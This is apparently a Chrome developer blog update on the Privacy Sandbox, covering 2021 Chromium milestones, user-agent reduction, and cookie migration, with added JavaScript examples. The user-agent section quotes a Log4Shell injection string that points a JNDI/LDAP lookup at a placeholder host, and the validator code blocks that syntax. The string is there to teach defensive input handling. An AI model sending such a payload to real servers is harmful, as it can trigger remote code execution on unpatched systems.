Progress in the Privacy Sandbox (December 2021)
Welcome to the 2021 wrap-up edition of Progress in the Privacy Sandbox, tracking the milestones on the path to phasing out third-party cookies in Chrome and working towards a more private web. Normally, we share an overview of updates to the Privacy Sandbox timeline along with news from across the project, but December was a quiet month. Instead, we'll look back at some of the activities over 2021 and provide a few potential resolutions you can make now we are in the new year.
Chromium development process
For a new web platform feature to land in Chromium, it needs to go through the project's open development process. In 2021, the Privacy Sandbox team produced:
🥚 | Intent to Prototype | 19 |
🧪 | Intent to Experiment | 7 |
🚀 | Intent to Ship | 11 |
Each milestone is also an invitation for the wider web ecosystem to contribute.
An Intent to Prototype is the first checkpoint, where we invite discussion and early experimentation. This means a proposal will be available on GitHub, where you can ask a question by creating an Issue or join discussions and presentations in standards groups such as the W3C and IETF. This is also where coding begins, which means you can expect the prototype functionality to be made available for developer testing behind a feature flag. Initial feedback is critical for validating and iterating on proposals.
An Intent to Experiment is an optional step if we’d like to request an origin trial. Developers can sign up for the origin trial of a feature, and then test it in production. It's called an experiment because we have specific aspects of the feature we want to validate in real-world environments. Developers that can test and share the results of those tests provide valuable feedback to help iterate and evolve the feature.
An Intent to Ship is the final milestone which signals that a feature is now complete and ready for general availability. Once approved, the feature is merged into an upcoming release and then progresses through the Canary, Beta, and Stable channels. It's critical to ensure you test your sites with the Canary and Beta versions of Chrome to catch and report any bugs before a feature reaches Stable.
Proposals
Each Privacy Sandbox proposal has an accompanying GitHub repository. A repository hosts an explainer to summarize overall functionality, a detailed specification for implementation by browsers, and contributions from across the web ecosystem in the form of Issues and Pull Requests.
Across 14 Privacy Sandbox repositories, we had:
💬 | 545 | Issues created |
💬 | 250 | Issues closed |
🛠️ | 261 | Pull Requests created |
🛠️ | 223 | Pull Requests merged |
The language in explainers and specifications is often targeted to an audience already familiar with standards and browser development, which can be challenging if you're unfamiliar with it. However, the aim of an explainer is to explain! If there are points that are unclear or not covered, we want you to raise an Issue so we can update and clarify the explainer.
Resolutions
User-agent spring cleaning
As we were counting down to the New Year, we're also counting up to both Chrome 100 and the incremental reduction of the user-agent string. This is a good motivator to revisit any usage of the user-agent string in your code to check if it's affected by either of these changes.
To find those areas:
- Search for navigator.userAgent in your JavaScript code, or access to the User-Agent header in your server code.
- Check your parsing of the string for assumptions about a 2 digit version. For example, a regex that specifies \d\d or \d{2} should be replaced with \d+.
- Check your use of the string for anywhere you rely on the:
  - platform (operating system) version
  - full Chrome build version
  - mobile device name
  These are the values that will be reduced to fixed strings in the future. If you need access to these values, migrate to User-Agent Client Hints.
There is one December update to mention: if you are adopting User-Agent Client Hints, we have sent the Intent to Ship to enable delegating hints to other origins in HTML via a <meta> tag. For example:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
If you're in an enthusiastic spring cleaning mood, you can also consider alternatives to the use of user-agent altogether. If you're using the string to detect mobile devices, then investigate if you can replace this with responsive design. If you're checking the browser name and version for feature support, see if you can use feature detection instead.
It's always worth remembering that the user-agent, like any client-provided value, is not guaranteed to be accurate or even provided. The recent Log4j vulnerability, "Log4Shell", provides an example of this risk. A client that sets its user-agent string to include a value like ${jndi:ldap://example.com/file} may be able to get a site to actively parse that on the server.
It's critical that you treat user-agent in the same way as any other form of user input: sanitize and validate it before acting on the value.
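The two checks described above (the two-digit version assumption and validating the header before use) can be exercised together. This is an added example, not code from the original post; the function names and the 512-character limit are assumptions.

```javascript
// Added example: names below (validateUserAgent, chromeMajor*) are hypothetical.
const MAX_UA_LENGTH = 512; // assumed limit, tune to your own traffic

// Treat the header as untrusted input: it may be absent, oversized, or carry
// characters that a downstream logger or template engine would interpret.
// This is defence in depth and does not replace patching the logging library.
function validateUserAgent(raw) {
  if (typeof raw !== 'string' || raw.length === 0) return null;
  if (raw.length > MAX_UA_LENGTH) return null;
  // Printable ASCII only, which also rejects CR/LF that could split log lines.
  if (!/^[\x20-\x7e]+$/.test(raw)) return null;
  // Reject lookup syntax such as the "${...}" form quoted in the text.
  if (raw.includes('${')) return null;
  return raw;
}

// Brittle: assumes a two-digit major version, so Chrome 100 is read as 10.
function chromeMajorBrittle(ua) {
  const m = /Chrome\/(\d\d)/.exec(ua);
  return m ? Number(m[1]) : null;
}

// Robust: any number of digits, terminated by the first dot.
function chromeMajor(ua) {
  const m = /Chrome\/(\d+)\./.exec(ua);
  return m ? Number(m[1]) : null;
}

// Constructed sample values; the third is the string quoted in the text.
const SAMPLES = [
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36',
  '${jndi:ldap://example.com/file}',
  undefined,
];

function report(samples) {
  return samples.map((raw) => {
    const ua = validateUserAgent(raw);
    if (ua === null) return { accepted: false };
    return { accepted: true, brittle: chromeMajorBrittle(ua), robust: chromeMajor(ua) };
  });
}

console.log(report(SAMPLES));
```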
Cookie cataloguing
Another traditional new year activity is to make sure you're happy that you have a healthy number of cookies with quality ingredients. As we continue moving towards the phase out of third-party cookies, you should make sure you know which of your site's cookies will be affected. 2020 provided a head start as it became necessary to mark all cookies for cross-site or third-party use with SameSite=None.
Any cookie where you have set the SameSite attribute to None will need an update.
There are three possible routes to consider at the moment:
- If the cookie is only required in a 1:1 relationship with the top-level site, then follow the progress of the CHIPS proposal. This will mean adding the Partitioned attribute to the cookie.
- If the cookie is used in a cross-site context, but only across sites that you own and operate, then it may be a candidate for First-Party Sets. This requires defining the sites in the set and adding the SameParty attribute to the cookie.
- If the cookie is used to provide some form of shared value across multiple sites, investigate the wider set of Privacy Sandbox proposals for an alternative solution that does not rely on cross-site tracking.
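One way to start the catalogue is to run the Set-Cookie headers your site emits through a small classifier that flags every SameSite=None cookie and notes whether it already carries Partitioned or SameParty. This is an added example, not code from the original post; the function names, status labels and sample headers are constructed for illustration.

```javascript
// Added example; function names and status labels are hypothetical.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? '' : pair.slice(0, eq);
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    // Attribute names are case-insensitive; flags such as Secure have no value.
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name, attrs };
}

function classifyCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const sameSite =
    typeof attrs.samesite === 'string' ? attrs.samesite.toLowerCase() : null;
  // Only cookies explicitly marked SameSite=None are sent cross-site.
  if (sameSite !== 'none') return { name, status: 'not-cross-site' };
  // Chrome rejects SameSite=None cookies that are not also Secure.
  if (attrs.secure !== true) return { name, status: 'none-without-secure' };
  if (attrs.partitioned === true) return { name, status: 'partitioned' };
  if (attrs.sameparty === true) return { name, status: 'sameparty' };
  // Still relies on unpartitioned cross-site access: pick one of the routes.
  return { name, status: 'needs-decision' };
}

// Constructed sample headers.
const SAMPLE_HEADERS = [
  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'widget_state=1; Path=/; Secure; SameSite=None',
  'embed_pref=dark; Path=/; Secure; samesite=none; Partitioned',
  'sso=xyz; Path=/; Secure; SameSite=None; SameParty',
  'legacy=1; Path=/; SameSite=None',
  'theme=light; Path=/',
];

function audit(headers) {
  return headers.map(classifyCookie);
}

console.log(audit(SAMPLE_HEADERS));
```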
If you're feeling especially health-conscious, then this is also an ideal time to revisit all of your cookie usage, as we have a good recipe to improve your first-party cookies too.
Feedback
As we continue to publish these monthly updates, and progress through the Privacy Sandbox as a whole, we want to make sure that developers receive the information and support that they need. Let us know on @ChromiumDev Twitter if there's anything that we could improve in this series. We'll use your input to continue improving the format.
Check out the Privacy Sandbox FAQ, which we continue to expand based on the issues you submit to the developer support repo. If you have any questions around testing or implementation on any of the proposals, come talk to us there.